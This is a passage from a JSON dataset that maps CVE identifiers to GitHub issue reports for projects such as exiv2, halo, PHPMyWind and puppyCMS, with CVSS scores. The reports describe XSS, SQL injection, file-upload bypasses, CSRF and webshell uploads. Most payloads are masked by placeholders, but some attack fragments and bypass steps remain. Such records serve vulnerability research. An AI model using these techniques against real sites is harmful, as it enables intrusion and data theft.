        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-18766",
        "Issue_Url_old": "https://github.com/AntSwordProject/antSword/issues/147",
        "Issue_Url_new": "https://github.com/antswordproject/antsword/issues/147",
        "Repo_new": "antswordproject/antsword",
        "Issue_Created_At": "2019-04-11T17:33:14Z",
        "description": "There is RCE Vulnerability in APITAG \u60f3\u4ea4\u67d0VE\uff0c\u6240\u4ee5\u4e0b\u9762\u5c31\u7528\u82f1\u6587\u5148\u5199\u4e86 When i connect to my webshell by antsword.If the connection fails, APITAG will echo error information. like this FILETAG this information don't have xss protect,so i can xss and execute system command My poc ERRORTAG FILETAG My exp (for perl) ERRORTAG base NUMBERTAG decode code ERRORTAG getshell FILETAG PATHTAG NUMBERTAG ERRORTAG add xss protect",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 6.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18771",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/756",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/756",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-03-25T03:52:31Z",
        "description": "one global buffer overread in APITAG in APITAG POC: FILETAG There exists one global buffer overread in APITAG in nikonmn_int.cpp in exi NUMBERTAG which could result in information leak. exi NUMBERTAG pt $poc NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG b NUMBERTAG d NUMBERTAG at pc NUMBERTAG b6efa9f3 bp NUMBERTAG bfc NUMBERTAG sp NUMBERTAG bfc NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG d NUMBERTAG thread T NUMBERTAG b6efa9f2 in APITAG APITAG const&, APITAG const ) PATHTAG NUMBERTAG b NUMBERTAG efc in APITAG APITAG const ) const PATHTAG NUMBERTAG b NUMBERTAG d6c1c in APITAG const ) const PATHTAG NUMBERTAG ef in APITAG const&, APITAG const ) PATHTAG NUMBERTAG d2d in APITAG const ) PATHTAG NUMBERTAG fabf1 in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG const&) PATHTAG NUMBERTAG d3aa5 in main PATHTAG NUMBERTAG b NUMBERTAG aaf2 ( PATHTAG NUMBERTAG d1af4 in _start ( PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG is located NUMBERTAG bytes to the left of global variable APITAG from PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG of size NUMBERTAG b NUMBERTAG d NUMBERTAG is located NUMBERTAG bytes to the right of global variable APITAG from PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG APITAG APITAG const&, APITAG const ) Shadow bytes around the buggy address NUMBERTAG ed NUMBERTAG f9 f9 f NUMBERTAG ed NUMBERTAG f9 f9 f9 f NUMBERTAG ed NUMBERTAG ed NUMBERTAG ed NUMBERTAG f9 f9 f NUMBERTAG ed NUMBERTAG a0: f9 f9 f9 f9 f9 f9[f9]f9 f9 f9 f9 f NUMBERTAG ed NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG ed NUMBERTAG c NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG ed NUMBERTAG d NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG ed NUMBERTAG e NUMBERTAG ed NUMBERTAG f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18773",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/760",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/760",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-03-26T01:30:40Z",
        "description": "one invalid memory access in decode function in APITAG POC: FILETAG gdb args ./exi NUMBERTAG pt ~/segment_poc Program received signal SIGSEGV, Segmentation fault NUMBERTAG b7c NUMBERTAG d6 in APITAG APITAG APITAG out>, size=<optimized out>) at PATHTAG NUMBERTAG if ( APITAG != marker_) continue; (gdb) bt NUMBERTAG b7c NUMBERTAG d6 in APITAG APITAG APITAG out>, size=<optimized out>) at PATHTAG NUMBERTAG b7e NUMBERTAG in APITAG (this=<optimized out>, object NUMBERTAG at PATHTAG NUMBERTAG b7e NUMBERTAG in APITAG (this=<optimized out>, object=<optimized out>) at PATHTAG NUMBERTAG APITAG (this=<optimized out>, object=<optimized out>) at PATHTAG NUMBERTAG b7e NUMBERTAG e2a in APITAG (this NUMBERTAG cbf NUMBERTAG isitor=...) at PATHTAG NUMBERTAG b7e NUMBERTAG a in operator (this=<optimized out>, visitor=..., this=<optimized out>) at PATHTAG NUMBERTAG APITAG (this=<optimized out>, visitor=...) at PATHTAG NUMBERTAG b7e NUMBERTAG dae in APITAG (this NUMBERTAG cbd NUMBERTAG isitor=...) at PATHTAG NUMBERTAG b7e NUMBERTAG f NUMBERTAG in APITAG APITAG APITAG APITAG APITAG out>, size=<optimized out>, root=<optimized out>, APITAG out>, APITAG out>) at PATHTAG NUMBERTAG b7cf NUMBERTAG be in APITAG (this=<optimized out>) at PATHTAG NUMBERTAG e NUMBERTAG in APITAG (this NUMBERTAG cbb NUMBERTAG at PATHTAG NUMBERTAG c NUMBERTAG in APITAG (this NUMBERTAG cbb NUMBERTAG PATHTAG ) at PATHTAG NUMBERTAG dd9b in main (argc=<optimized out>, argv=<optimized out>) at PATHTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18774",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/759",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/759",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-03-26T01:26:12Z",
        "description": "float point exception in APITAG function in APITAG POC: FILETAG gdb args ./exi NUMBERTAG pt ~/fpe_poc Program received signal SIGFPE, Arithmetic exception NUMBERTAG b7e0c1a2 in APITAG (os=..., value=...) at PATHTAG NUMBERTAG if (r.second NUMBERTAG return os << APITAG / r.second; (gdb) bt NUMBERTAG b7e0c1a2 in APITAG (os=..., value=...) at PATHTAG NUMBERTAG b7c NUMBERTAG f NUMBERTAG in APITAG (this NUMBERTAG d NUMBERTAG os=..., APITAG out>) at PATHTAG NUMBERTAG b7c NUMBERTAG in APITAG (this=<optimized out>, APITAG at PATHTAG NUMBERTAG ec in APITAG (this=<optimized out>, md=..., APITAG out>) at PATHTAG NUMBERTAG ff5c in APITAG (this=<optimized out>, image=<optimized out>) at PATHTAG NUMBERTAG e NUMBERTAG in APITAG (this NUMBERTAG cbb NUMBERTAG at PATHTAG NUMBERTAG c NUMBERTAG in APITAG (this NUMBERTAG cbb NUMBERTAG PATHTAG ) at PATHTAG NUMBERTAG dd9b in main (argc=<optimized out>, argv=<optimized out>) at PATHTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18875",
        "Issue_Url_old": "https://github.com/dotCMS/core/issues/15882",
        "Issue_Url_new": "https://github.com/dotcms/core/issues/15882",
        "Repo_new": "dotcms/core",
        "Issue_Created_At": "2019-01-24T13:46:13Z",
        "description": "User Privileges in Velocity . Placeholder",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18877",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/175",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/175",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2019-03-27T08:29:39Z",
        "description": "wuzhicms NUMBERTAG PATHTAG sql injection vulnerability. hi: I found a sql injection vulnerability in PATHTAG FILETAG the parameter 'flag' didn't filtering of harmful input,so I can injection sql. payload like this: URLTAG xxxx' or APITAG or ' Result: FILETAG FILETAG suggest: $flag = APITAG Release Info NUMBERTAG author by: xijun. EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18879",
        "Issue_Url_old": "https://github.com/bludit/bludit/issues/1011",
        "Issue_Url_new": "https://github.com/bludit/bludit/issues/1011",
        "Repo_new": "bludit/bludit",
        "Issue_Created_At": "2019-03-29T09:47:56Z",
        "description": "a file upload vulnerability in PATHTAG Describe your problem a file upload vulnerability in PATHTAG can upload php file FILETAG Expected behavior Limit upload file type Actual behavior can upload php file Steps to reproduce the problem so I upload a php file FILETAG Visit FILETAG FILETAG Bludit version NUMBERTAG author by:xijun. EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18885",
        "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/4",
        "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/4",
        "Repo_new": "gaozhifeng/phpmywind",
        "Issue_Created_At": "2019-04-02T11:11:46Z",
        "description": "I found a php code execute in FILETAG at version NUMBERTAG hi: I found a php code execute in FILETAG at version NUMBERTAG open FILETAG NUMBERTAG at the setting watermark input the payload FILETAG Watermark text input xxx' Text color input APITAG FILETAG NUMBERTAG submit and visit watermark setting you can see the php code execute FILETAG because the payload was write in FILETAG FILETAG the FILETAG was inclue by require_once so php code execute FILETAG suggest: replace ' ,\\,;,(,) version NUMBERTAG author by xijun. EMAILTAG .cn I hope you can fix it",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-18886",
        "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/5",
        "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/5",
        "Repo_new": "gaozhifeng/phpmywind",
        "Issue_Created_At": "2019-04-02T11:57:38Z",
        "description": "I found upload vulnerability FILETAG getshell at version NUMBERTAG login as admin NUMBERTAG isit website setting upload type add PHP (space) FILETAG because Windows will remove the space so by pass suffix check NUMBERTAG upload a php file like APITAG name FILETAG FILETAG filename add a space you can see upload success FILETAG NUMBERTAG isit the link you can see php code was execute FILETAG becaue at PATHTAG FILETAG you do not check the input filename so trim(filename) can help you author by xijun. EMAILTAG .cn version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-18888",
        "Issue_Url_old": "https://github.com/choregus/puppyCMS/issues/15",
        "Issue_Url_new": "https://github.com/choregus/puppycms/issues/15",
        "Repo_new": "choregus/puppycms",
        "Issue_Created_At": "2019-03-27T15:55:43Z",
        "description": "There is a Arbitrary File Deletion vulnerability that can remove everything without admin login.. The vuln file is PATHTAG No need to login to admin, open the following one page. APITAG delete file/folder ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18889",
        "Issue_Url_old": "https://github.com/choregus/puppyCMS/issues/13",
        "Issue_Url_new": "https://github.com/choregus/puppycms/issues/13",
        "Repo_new": "choregus/puppycms",
        "Issue_Created_At": "2019-03-27T15:44:47Z",
        "description": "There is a CSRF vulnerability that can change the admin's password. The admin default password is puppycms. The vuln file is PATHTAG After the admin logged in, open the following one page. poc: APITAG change the admin's password ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18890",
        "Issue_Url_old": "https://github.com/choregus/puppyCMS/issues/14",
        "Issue_Url_new": "https://github.com/choregus/puppycms/issues/14",
        "Repo_new": "choregus/puppycms",
        "Issue_Created_At": "2019-03-27T15:50:21Z",
        "description": "There is a RCE vulnerability that can upload a webshell without admin login.. The vuln file is PATHTAG No need to login to admin, open the following one page. APITAG getshell ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18897",
        "Issue_Url_old": "https://github.com/libyal/libpff/issues/62",
        "Issue_Url_new": "https://github.com/libyal/libpff/issues/62",
        "Repo_new": "libyal/libpff",
        "Issue_Created_At": "2018-06-23T06:52:35Z",
        "description": "APITAG heap use after free at APITAG POC files: FILETAG FILETAG APITAG output: URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-18897",
        "Issue_Url_old": "https://github.com/libyal/libpff/issues/61",
        "Issue_Url_new": "https://github.com/libyal/libpff/issues/61",
        "Repo_new": "libyal/libpff",
        "Issue_Created_At": "2018-06-23T06:51:13Z",
        "description": "APITAG heap use after free at APITAG POC files: FILETAG FILETAG APITAG output: URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-18898",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/741",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/741",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-03-13T08:57:11Z",
        "description": "FILETAG The ASAN dumps the stack trace as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18899",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/742",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/742",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-03-13T12:11:16Z",
        "description": "Program crash due to uncontrolled memory allocation on function APITAG APITAG sizeof(box)). Hi there, An issue was discovered in APITAG APITAG sizeof(box)) function in APITAG as distributed in master and version NUMBERTAG There is an uncontrolled memory allocation problem, leading to a program crash. I have also confirmed this issue by using APITAG Here is the POC file. Please use the \u201c./exi NUMBERTAG pX $POC\u201d to reproduce the bug. FILETAG ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18900",
        "Issue_Url_old": "https://github.com/libyal/libexe/issues/1",
        "Issue_Url_new": "https://github.com/libyal/libexe/issues/1",
        "Repo_new": "libyal/libexe",
        "Issue_Created_At": "2018-09-01T06:46:32Z",
        "description": "Multiple heap buffer overflow errors inside function APITAG in libexe_io_handle.c. Multiple heap buffer overflow errors inside function APITAG in libexe_io_handle.c We found with our fuzzer multiple heap buffer overflow errors inside function APITAG The version we use is \"exeinfo NUMBERTAG These can be triggered when compiled with address sanitizer and run with exe file. Here is the POC files: FILETAG For example: ERRORTAG And ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-18964",
        "Issue_Url_old": "https://github.com/saysky/ForestBlog/issues/20",
        "Issue_Url_new": "https://github.com/saysky/forestblog/issues/20",
        "Repo_new": "saysky/forestblog",
        "Issue_Created_At": "2019-04-04T05:09:18Z",
        "description": "There is csrf vulnerability . csrf vulnerability In this vulnerability, if the admin user click the Fishing links the hacker provided, the it can generate a new user that can login in the website management background. I review the code in the project, then I found that the code where the admin add other users, it has no protection for Cross site request forgery. FILETAG FILETAG so, I use burp to generate the CSRF Poc. FILETAG FILETAG then, if the admin click the button(some csrf link), it generates a new user admin2 in the websie. FILETAG admin2 can login in the website background. FILETAG for more test, this vulnerability can also use to delete some user in the website.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18976",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/556",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/556",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2019-05-07T12:23:01Z",
        "description": "Bug]. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug There is a buffer overflow write at APITAG , download at lastest commit APITAG Code near APITAG is showed below. The code didn't check whether the data is long enough comparing IP and TCP packet length. When running the poc, the data len is even less than IP header. So a buffer overflow write will reported when writing to TCP header. CODETAG To Reproduce Steps to reproduce the behavior NUMBERTAG download the code from commit APITAG (master head now NUMBERTAG download FILETAG NUMBERTAG Compile program with APITAG NUMBERTAG Execute APITAG Expected behavior A buffer overflow write will be reported by ASAN, which is showed at below screen shots part. Screenshots ERRORTAG System (please complete the following information): OS: ubuntu linux OS version NUMBERTAG generic NUMBERTAG Ubuntu SMP Thu Oct NUMBERTAG UTC NUMBERTAG APITAG Tcpreplay Version : master head at NUMBERTAG commit APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-18979",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/126",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/126",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2019-04-04T02:46:43Z",
        "description": "These is A stored xss vulnerability. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG x] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) x] BUG \u53cd\u9988 [ ] \u6dfb\u52a0\u65b0\u7684\u7279\u6027\u6216\u8005\u529f\u80fd [ ] \u8bf7\u6c42\u6280\u672f\u652f\u6301 In [issue NUMBERTAG URLTAG , someone reported two storage XSS, and you have fixed, but the Second XSS. But it still has another output point APITAG payload HTTP Requests ERRORTAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18980",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/134",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/134",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2019-04-04T08:32:35Z",
        "description": "Remote Code Execution in your system. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG x] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) [x] BUG \u53cd\u9988 [ ] \u6dfb\u52a0\u65b0\u7684\u7279\u6027\u6216\u8005\u529f\u80fd [ ] \u8bf7\u6c42\u6280\u672f\u652f\u6301 Bug Report I read the code and find that function APITAG have a system call as ERRORTAG in ERRORTAG and you have do nothig with the APITAG and APITAG , so I can type in APITAG and APITAG is APITAG to RCE CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18982",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/127",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/127",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2019-04-04T03:19:25Z",
        "description": "These is Another stored xss vulnerability. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG x] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG but do nothing with APITAG FILETAG payload: ERRORTAG \\ APITAG ERRORTAG in uri APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-18984",
        "Issue_Url_old": "https://github.com/buxu/bug/issues/2",
        "Issue_Url_new": "https://github.com/buxu/bug/issues/2",
        "Repo_new": "buxu/bug",
        "Issue_Created_At": "2019-04-05T08:23:35Z",
        "description": "Reflected XSS via Host header injection on Zimbra . Affected product: Zimbra Collaboration Version testing NUMBERTAG latest version) Affected function: PATHTAG OS: Centos7 FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18985",
        "Issue_Url_old": "https://github.com/buxu/bug/issues/3",
        "Issue_Url_new": "https://github.com/buxu/bug/issues/3",
        "Repo_new": "buxu/bug",
        "Issue_Created_At": "2019-04-05T08:45:33Z",
        "description": "Open Redirect vulnerability on Zimbra. Affected product: Zimbra Collaboration Version testing NUMBERTAG latest version) Affected function: URLTAG OS: Centos7 FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18998",
        "Issue_Url_old": "https://github.com/xpleaf/Blog_mini/issues/44",
        "Issue_Url_new": "https://github.com/xpleaf/blog_mini/issues/44",
        "Repo_new": "xpleaf/blog_mini",
        "Issue_Created_At": "2019-04-09T06:55:36Z",
        "description": "Two Cross Site Scripting vulnerability in latest release NUMBERTAG A Cross site scripting on Add plugin Description Cross site scripting (XSS) vulnerability in PATHTAG line NUMBERTAG APITAG | safe }} Use jinja2's safe tag to allow plugin content to be escaped and not filtered, resulting in Cross site scripting (XSS) vulnerability Steps To Reproduce: After the administrator logged in. Url : URLTAG Data APITAG APITAG FILETAG back to the homepage FILETAG FILETAG NUMBERTAG A Cross site scripting on Add Article Description Cross site scripting (XSS) vulnerability in PATHTAG line NUMBERTAG APITAG | safe }} Use jinja2's safe tag to allow plugin content to be escaped and not filtered, resulting in Cross site scripting (XSS) vulnerability Steps To Reproduce: After the administrator logged in. URL URLTAG Data: APITAG APITAG &types NUMBERTAG summary=test FILETAG back to the homepage and Click on article ,this will trigger xss URLTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19000",
        "Issue_Url_old": "https://github.com/tankywoo/simiki/issues/123",
        "Issue_Url_new": "https://github.com/tankywoo/simiki/issues/123",
        "Repo_new": "tankywoo/simiki",
        "Issue_Created_At": "2019-04-15T12:27:24Z",
        "description": "Smiik NUMBERTAG ss + rce. APITAG Examples: APITAG FILETAG The affected file appears to be FILETAG Line NUMBERTAG By default, jinja2 sets autoescape to False. Consider using APITAG or use the select_autoescape function to mitigate XSS vulnerabilities NUMBERTAG rce FILETAG line NUMBERTAG Use of unsafe yaml load. Allows instantiation of arbitrary objects. Consider APITAG This can lead to remote code execution. When simiki loads a malicious FILETAG file. Payload\uff1a APITAG When using smiik again, smi will load FILETAG and cause remote code execution FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19002",
        "Issue_Url_old": "https://github.com/stephenmcd/mezzanine/issues/1921",
        "Issue_Url_new": "https://github.com/stephenmcd/mezzanine/issues/1921",
        "Repo_new": "stephenmcd/mezzanine",
        "Issue_Created_At": "2019-04-23T10:01:01Z",
        "description": "mezzanine xss. Version NUMBERTAG My English is not good, the report is translated by Google. Recurring vulnerabilities: Vulnerability url: APITAG When adding a blog, use Burpsuite to capture the package, modify the title to APITAG and the content as APITAG FILETAG Return APITAG to trigger the xss FILETAG The cause of the vulnerability is due to the description_from_content function of core/models.py, line NUMBERTAG where the value of title is called, resulting in xss FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19003",
        "Issue_Url_old": "https://github.com/liftoff/GateOne/issues/728",
        "Issue_Url_new": "https://github.com/liftoff/gateone/issues/728",
        "Repo_new": "liftoff/gateone",
        "Issue_Created_At": "2019-04-09T07:10:01Z",
        "description": "Gate One Whitelist Bypass. There is a configuration item \u201dorigins\u201d: FILETAG NUMBERTAG To make sure the attacker has tried to access the Gate One server, check the gateone log in the attacked host B, the result is as followed: FILETAG It proves that Gate One not recorded the real IP address of attack host APITAG instead of \u201clocalhost NUMBERTAG when the service verifies the APITAG NUMBERTAG Change http service port NUMBERTAG to NUMBERTAG on attack host A NUMBERTAG Access the page by URL APITAG in the attack host A, the response is as followed: FILETAG It means the attack host A has connect to the Gate One successfully NUMBERTAG Check logs of Gate One, the attack host A APITAG established a connection with the attacked host: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19005",
        "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/48",
        "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/48",
        "Repo_new": "94fzb/zrlog",
        "Issue_Created_At": "2019-04-07T11:14:36Z",
        "description": "Unauthorized access to download database backup files NUMBERTAG No permission check due to export database backup file APITAG users can download the database backup file directly APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.7,
        "impactScore": 3.6,
